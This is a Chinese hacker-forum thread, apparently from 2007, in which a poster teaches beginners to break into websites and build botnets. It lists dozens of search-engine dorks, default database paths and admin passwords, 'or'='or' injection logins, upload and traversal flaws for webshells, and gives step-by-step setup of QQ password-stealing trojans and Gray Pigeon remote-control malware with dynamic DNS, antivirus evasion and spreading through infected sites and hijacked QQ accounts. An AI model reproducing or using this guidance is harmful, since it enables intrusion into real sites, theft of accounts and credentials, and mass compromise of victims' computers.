1个月 你能从肉鸡走到什么地步？

撒旦

8.
/Database/#newasp.mdb
关键词：NewAsp SiteManageSystem Version
9.
用挖掘机
关键字：Powered by WEBBOY
页面：/upfile.asp
10.
baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)
11.
Upfile_Article.asp bbs/upfile.asp
输入关键字：powered by mypower ，
12.
inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站
13.
现在GOOGLE搜索关键字 intitle:网站小助手　inurl:asp
14.
键字： 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛
挖掘鸡的关键字 添 setup.asp
15.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手 下载地址:百度 Google!
2.Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了
16.
1.打开百度或GOOGLE搜索，输入powered by comersus ASP shopping cart
open source。 这是一个商场系统。
2.网站的最底部分，有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb，不能下载。
那样把前一个''store/''除去，再加上database/comersus.mdb 试试
17.
无忧传奇官方站点程序。
1、后台管理地址：http://您的域名/msmiradmin/
2、默认后台管理帐号：msmir
3、默认后台管理密码：msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 ***********/Conn.asp
18.
百度里输入/skins/default/
19.
利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞 工具使用
20.
上传漏洞.
工具 : Domain3.5
网站猎手 1.5版
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp
21.
新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码，软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
\database\%23newasp.mdb
如：#xzws.mdb 改成%23xzws.mdb
22.
通吃所有商城+动力上传系统
使用工具:挖掘鸡 v1.1 明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp
动力入侵:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
23.
注射漏洞
百度搜索:oioj's blog
24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'
26.
入侵魔兽私服
需要的工具：ASP木马一只。
Domain3.5明小子
关键字：All Right Reserved Design:游戏联盟
后台地址：admin/login.asp
数据库的地址：chngame/#chngame.mdb
27.
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp
28.
国外站的爆库漏洞
关键字：sad Raven's Guestbook
密码地址:/passwd.dat
后台地址:/admin.php
29.
Discuz 4.1.0跨站漏洞
利用工具:1,WAP浏览器
2,WAP编码转换器
关键字:"intext:Discuz! 4.1.0"
30.
关键字：尚奈克斯
后台路径/system/manage.asp
直接传ASP木马
31.
工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能，否则您将不能登录
插入diy.asp
32.
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb
33.
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp

撒旦

34.
关键子 XXX inurl:Nclass.asp
在"系统设置"里写个木马。
会被保存到 在 config.asp内。
35.
不进后台照样拿动网WEBSHELL
data.asp过滤了=BackupData 动网数据库备份默认路径
36.
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'
37.
关键字:Powered by:QCDN_NEWS
随便扫遍文章加一个' ,来试探注入点
后台地址:admin_index.asp
38.
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp过滤了Type=mod&picName=xuanran.asp
再上传马.....
进访问uppic anran.asp 登陆马.
39.
关键字:Power System Of Article Management Ver 3.0 Build 20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!
40.
一、通过GOOGLE搜索找大量注入点
关键字：asp?id=1 gov.jp/ asp?id=
页数：100
语言：想入侵哪个国家就填什么语言吧
41.
关键字：Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd
42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录　进入
默认数据库地址:Database/DataShop.mdb
43.
关键字:****** inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话木马
44.
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!
45.
关键字：程序核心：BJXSHOP网上开店专家
后台:/admin
是不是有点晕~~~
强烈推荐一本书 肉鸡菜鸟入侵网站必备的！！！！！！！
黑客手册的《脚本黑客入门提升》
真的很好``详细讲解的各种入侵的方法和技巧 通俗易懂 老少皆伊~~

3365231

值得一顶~楼主辛苦了~~ [s:161][s:161]

hcroget

一个月一样是肉鸡，或者说是下载所谓的黑客软件。帮人家种马的肉鸡

撒旦

首先表明几个观点：1。谁也不欠你的 这个软件问我从哪里下 那个漏洞问我怎么利用 跟你说自己去搜索还不乐意 你的意思是我都记在
脑子了？ 我也一样要给你们去查 不要懒到这个地步
2。盗QQ的确是很多人来黑羽的目的 也是很多人对黑客产生兴趣的原因 是啊 免费刷QB 服务 诱人不？ 而且各种网络游戏的号 值钱不？
道理都一样 会一样 会百样 可是又有什么意义？ 不瞒大家说 当初我也是第一个学的盗号``可是你只满足这点 原地踏步
这辈子不会有出息
3。师傅徒弟的事情 我收过几个徒弟 都是300块终生技术更新的 也是因为生活所迫
你以为当师傅好当？ 我见过连解压缩都不会的人问我怎么盗人QQ号 发QQ木马给他他都打不开``每天费劲唇舌 就为那300块
这个纯粹是个人观点 其实不赞成菜鸟拜师 高手收徒弟 大家都是朋友 水平相当研究技术 多么痛快淋漓
4。VIP会员这个事情 我加过黑防的钻石vip 后来就后悔了 教程更新太慢 说24小时有技术人员支持 结果就QQ会员群解散了~
不反对大家加VIP 毕竟有些软件 外面找的不安全
5。多看教程动画 功防文章 实地演练 当你第一次盗到QQ 当你第一次抓到肉鸡 当你第一次得到WEBSHELL 当你第一次破解软件
恭喜你 你的兴趣就来了~半途而废的人很多 只有你走过来了 才发现 原来黑客就是努力的过程
恩```下面是面对菜鸟的一点心得 都是我走过来的 至少在2007年5月5日 都是好用的~
怕看不懂？？ 别怕 我这人最随和 高深的词语咱不会说 我就用人人都能懂的语言说
1。菜鸟的3389问题：需要工具端口扫描器 3389登陆器 在断口扫描器的IP填写段里写入一段IP地址
端口处写3389 扫描出来的IP 就是3389肉鸡 打开3389登陆器输入IP
如果是XP系统 那么就试一下 用户名：new 密码为空 原理是什么我就不解释了 多试几个 是不是就进去了~
第一次看别人屏幕的感觉是不是很好~~如果对方不在线（吃饭睡觉时间成功率很大） 你想干什么都可以
2。有了3389的基础 咱来配置木马吧~~其实现在分盗号木马和远控木马的话 是2种方法
盗号木马就以QQ为例子吧 目前好用的QQ木马很多 我推荐（胖子QQ木马）
首先要申请个空间 很多人免费ASP空间哪里有
自己不会查？？ 不过我还是推荐2个 绝对好用的~
一个是常来网 一个是火山互连 俩个都支持ASP 首先把木马里面的ASP文件上传到空间里 点测试收信
刷新你的空间 如果多出来一个文本文件 那么就是成功了~把你空间里的ASP文件的URL写在木马生成器的
网站（空间）收信的地方 生成木马可以了 上传到空间 （可能会被杀 建议用超级加花器加花后上传）
远控木马以灰鸽子为例子 我会在2楼详细写一下 真正好用的内网外网上线和鸽子配置免杀等一系列东西~
之后就要靠大家发挥 可以通过3389 可以通过QQ 可以通过网站挂马 我只负责入门
3。木马配置好了 怎么抓肉鸡呢？
最快的当然是网站挂马 什么？ 不会？~·！！ 别怕别怕 通常第一次尝到鸡味道都会着迷的抓上一星期``
有杀毒可以给他关掉 QQ上群发邮件 传给你的好友 （而且如果你盗了QQ``那上他们的QQ继续传``子生孙``
孙生子``子子孙孙无穷尽也``还有一个就是网上教程很多的通过135入侵的方法 可以去查 很多很多
说靠这些日理万鸡也不是不可能``
方法大同小yi~还是3389控制别人机器 访问你的木马地址 下载后运行
当你有了几百只以后 就会觉得一个一个抓好累啊``掉鱼成功率也不高``自然就会向
网站挂马方向发展了 这个准备在第三楼详细写~
4。你想想~别人中了你马 杀毒软件是干什么的？ 第一个就拿你的马开刀 所以 一个免杀的马是必须的！！！
准备在4楼相信讲一下鸽子的免杀~
5。5楼准备写一下破解软件的菜鸟路程 看到黑防鸽子 是不是也想出来一个**鸽子啊`
你的名字会被一个软件传到千家万户~
到此为止 也许会花费你1个月的时间来学习 实践 熟练 从此 你成为了一个从肉鸡到菜鸟的脱变

鸽子的外网内网上线与配置

鸽子的外网内网上线与配置
首先 先判断你是内网还是外网 通常网吧和学校是内网 家里是外网 具体可以去google搜索一下判别方法
准备工作：
去３３２２。org注册一个号（我徒弟曾经问过我怎么注册｀｀希望大家不要问``）
点域名管理 建立动态 建立成功之后就会有你的*****.3322.org的域名了~
下载3322的客户端 在管理帐号的地方填写你刚注册的域名 号 密码 点增加~
再点一次更新 保险点``
下面打开鸽子 推荐 黑防鸽子
配置服务端的地方 第一个地方写你的域名 就是*****。3322。org
其他地方随便你写~~具体没什么大影响 点生成服务端后 就是你的鸽子木马了
下面
点“工具”
里面的FTP架设 随便选一个文件夹 输入你3322域名的帐号和密码 下面俩个选项都选上吧
点启动服务 出来FTP START！就是启动了
下面的WEB架设 也选上面的那个文件夹 也都选上 点启动服务 如果说80端口别占用 也可以换一个口~
现在告一段落 到了最最重要的自动上线的地方了！
FTP服务器 就写你的****。3322。org域名就行 端口地方 要和你FTP架设里设的端口一样（不是21就是2121
我记得是```）
号和密码就是你3322的号和密码
点更新IP 是不是说你自动上线设置成功了呢~~就等着肉鸡来找你吧~（注意 3322的域名最好固定使用
因为鸽子就是通过你的配置来区分的 如果你换了 就找不到你的鸡了~）
以上是外网的鸽子教程 有不懂的可以问 我第一时间回答你
其他远控木马也差不多 基本和这个一样

内网 只有2种最实用的方法

内网 只有2种最实用的方法
一个是你的路由器 如果你能取得你的路由控制权 就可以用这个方法
具体步骤
在IE地址栏里输入“192。168。0。1 或者。1。1” 如果出来一个让你登陆的界面
输入号和密码（通常是自己猜 大家可以去看下各种路由的初始密码和号）
实在不行``你问问网吧老板吧``应该不会打你```
如果你蒙对了~恭喜恭喜~你鸽子可以来找你~~路由界面里找到“代理服务器设置”
IP地方写上你机器的IP 一般是192。168。*。*什么的 端口那里选全开吧~
保存一下
这样就可以直接上线了
还有一种方法 是要有人帮忙 黑防“”工具“”里面有个内网端口映射
直接生成后给你的外网朋友运行
确定运行之后 在内网端口映射的IP地址上写你朋友的IP
然后点连接--开始映射--映射断口成功！
这样你的鸽子也能找到你进行上线了~~
（这里说的朋友``很多种``大家了解哈`只要是外网的``3389啊``肉鸡啊``都可以做映射``）
这就是2种内网的上线方法 以后我会继续编辑 写的是不是有点乱？

网站的入侵

这个是一个非常大的话题 无论是肉鸡菜鸟还是高手都靠这个吃饭了~
所以涉及到的知识特别的多
我只推荐一篇适合我们肉鸡看的文章和几个肉鸡用的软件

45种方法拿WEBSHELL
45种可以拿到Webshell的程序
到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!
2,
到Google ,site:cq.cn inurl:asp
3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆
4,
关键字：Co Net MIB Ver 1.0网站后台管理系统
帐号密码为 'or'='or'
5.
动感购物系统
inurl:help.asp登陆，如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个，一般管理员都忽视了这2漏洞
6。
默认数据库地址blogdata/acblog.asa
关键字：acblog
7.
百度 /htdocs
注册里可以直接上传asa文件！

周星星1

谢谢分享。